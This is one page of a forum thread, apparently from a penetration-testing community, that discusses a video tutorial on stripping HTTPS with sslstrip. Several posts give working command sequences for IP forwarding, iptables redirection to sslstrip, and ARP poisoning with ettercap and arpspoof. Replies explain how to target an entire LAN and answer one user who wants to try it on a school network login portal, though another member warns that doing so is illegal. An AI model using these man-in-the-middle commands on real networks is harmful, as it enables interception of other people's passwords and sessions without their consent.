Page 3 of 8 FirstFirst 12345 ... LastLast
Results 21 to 30 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #21
    Just burned his ISO
    Join Date
    Apr 2010
    Location
    Argentina
    Posts
    1

    Question Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hi all. I've a question. Why do you use "-k" when you launch sslstrip? what's the difference if you don't use it? (I'm about to try that)

    Thank you


    Av4t4r.


    P.S: my first post

  2. #22
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Here is a better way of doing this:

    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off & redir_command_on in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0 -M ARP //
    This way we could poison all ip

  3. #23
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by opreat0r View Post
    Theres also xhydra if you dont like the CLI helps with trial and error type of attacks
    Isnt xhydra xhydra Bruteforcing? This isnt about that. This is about sniffing traffic and watching it being pass over the network. Not us doing trial and errorpassword guessing.



    Quote Originally Posted by sql-inj View Post
    I cant see the reason for using both ettercap AND arp-spoof. You can do the arp-poisoning using ettercap, no need for arp-soof.

    (If I am mistaken, please do correct me)
    I had problems when using JUST ettercap. I dunno why that was right now tho



    Quote Originally Posted by ethicalhacker View Post
    That was the great posting.

    I have doubt

    I dont find wlan0 in my lan.

    Can i interchange, it will eth0

    will it work???
    wlan0 = Wireless
    eth0 = Ethernet (wired).
    I was doing it over my wireless network. If you dont have a wireless network - you can also do it over wired, just replace wlan0 with your interface! (e.g. eth0 or eth1)



    Quote Originally Posted by leroy View Post
    Can anyone provide a "cleanup" routine for this?

    So the attacker system is in same state as before.

    Thanks
    Leroy
    As Corleone said
    Code:
    iptables --flush
    will reset the iptables. the other programs , once you quit them, tidy themselves up.



    Quote Originally Posted by nivong View Post
    You have some typo's in your code:

    Code:
    kate /etc/etter.conf
    and
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    thats all
    Thanks for pointing this out!



    Quote Originally Posted by Dezio View Post
    Thanks for the tut, I've tryed it and all work correctly.
    I've just a question.. how can I "arpspoofing" the the entire lan? can I use something like this?


    Code:
    arpspoof -i wlan0 -t 192.168.*.* 192.168.1.1
    khianhui has this covered.
    Quote Originally Posted by khianhui View Post
    you should find it out which is the broadcast address of your network. For example 192.168.1.255 instead of 192.168.1.*.


    Quote Originally Posted by Av4t4r View Post
    Hi all. I've a question. Why do you use "-k" when you launch sslstrip? what's the difference if you don't use it? (I'm about to try that)

    Thank you


    Av4t4r.


    P.S: my first post
    sslstrip 0.6 by Moxie Marlinspike
    Usage: sslstrip <options>
    Options:
    -w <filename>, --write=<filename> Specify file to log to (optional).
    -p , --post Log only SSL POSTs. (default)
    -s , --ssl Log all SSL traffic to and from server.
    -a , --all Log all SSL and HTTP traffic to and from server.
    -l <port>, --listen=<port> Port to listen on (default 10000).
    -f , --favicon Substitute a lock favicon on secure requests.
    -k , --killsessions Kill sessions in progress.
    -h Print this help message.
    What this does (If I remember rightly), any current connect sessions, are killed once this is run. For example. if they where logged into gmail, they would have to re log in again. I also recommend trying trying "-f". See what that does


    Quote Originally Posted by joker5bb View Post
    Here is a better way of doing this:

    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off & redir_command_on in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0 -M ARP //
    This way we could poison all ip
    I had problems when I tired it using ettercap to do the arp posion. You can tho do all IPs with arpspoof! *see above*
    edit: Your also missing an extra // if you did wanna try ettercap
    Code:
     ettercap -T -q -i wlan0 -M ARP // //
    Last edited by g0tmi1k; 04-18-2010 at 07:09 PM.
    Have you...g0tmi1k?

  4. #24
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hello. I don't understand some sitiations.

    Why are you using --destination port 80 if https work on port 443?.
    On my case, change the value in ip_forward is not working; I just can use the forwarding capabilities when use fragrouter but the sniffer don't work, no one decripted data I can get.

    I have tried make the attack on my test room and I can't get it work.

    iptables -t nat A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

  5. #25
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    can this be done with the mon0 interface simply while sniffing the network with airmon-ng or does wlan0 have to actually be connected to the wireless network in order to use arpspoof and sslstrip?

  6. #26
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by mastodongle View Post
    can this be done with the mon0 interface simply while sniffing the network with airmon-ng or does wlan0 have to actually be connected to the wireless network in order to use arpspoof and sslstrip?
    you need to be on the gateway for the attack

  7. #27
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Thumbs up Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thank you so much man!
    I didn't know how to bypass the SSL security.

    BTW: I think someone on my net (200+ PCs on the net) tried to sniff my brother's passwords...(firefox blocked it like in your video).

    Is there any way which I can track the attacker / block the attacks?

    edit: I wasn't able to sniff the whole network.
    How can I sniff (with ettercap) range of IPs?
    Because putting 192.168.0.255 didn't work (it's just 1 computer)
    Last edited by proisr; 04-26-2010 at 12:45 PM.

  8. #28
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    you are perfect m8! and i have a question


    we use cyberoam to enter the internet @ my school. When you connect to school wireless, its redirect you http://192.168.150.1:8090/httpclient.html and you have to enter your username and password to use internet connection..

    1. should i enter my pass and user name to sniff? Or being connected to wireless enough?
    2. when i use ifconfig it says Bcast:192.168.62.255 do i use this instead of 192.168.1.1?

  9. #29
    Junior Member WolverineOD's Avatar
    Join Date
    Apr 2010
    Location
    Infront of Screen
    Posts
    28

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by nicksiz View Post
    we use cyberoam to enter the internet @ my school
    As tempting as it may be to try arpspoofing your school network, You should first realize that its illegal to do without explicit consent from your school (Which i doubt they will give) and that we don't support or condone this kind of activity in these forums. Besides which this will totally kill all the network traffic(because all the traffic is being routed through the attackers pc, downside of arpspoofing) and your system admins will likely notice if they know what they are doing. Its not worth it. Take care mate.

    However if anybody else is confused about this:
    Quote Originally Posted by nicksiz View Post
    when i use ifconfig it says Bcast:192.168.62.255 do i use this instead of 192.168.1.1?
    Yes this is the case. If you have a different broadcast address, use it. The addresses given by g0tmi1k are only example addresses, which apply to the network he was using. Addresses will likely be different for your own network. Hope that helps.

  10. #30
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    thanks m8 for your answer. its not illegal because i have doing it with my teacher for his pc only but we didnt done it . thanks 4 your help this forum is perfect

Page 3 of 8 FirstFirst 12345 ... LastLast

Similar Threads

  1. Sickness - Password Sniffing with SSLStrip.
    By sickness in forum BackTrack Videos
    Replies: 35
    Last Post: 09-17-2010, 01:16 PM
  2. creating BT4 USB persistent video
    By jimmy in forum Beginners Forum
    Replies: 0
    Last Post: 02-12-2010, 11:45 PM
  3. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  4. Video Capture Software
    By sprouty in forum Beginners Forum
    Replies: 4
    Last Post: 01-25-2010, 11:16 AM
  5. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •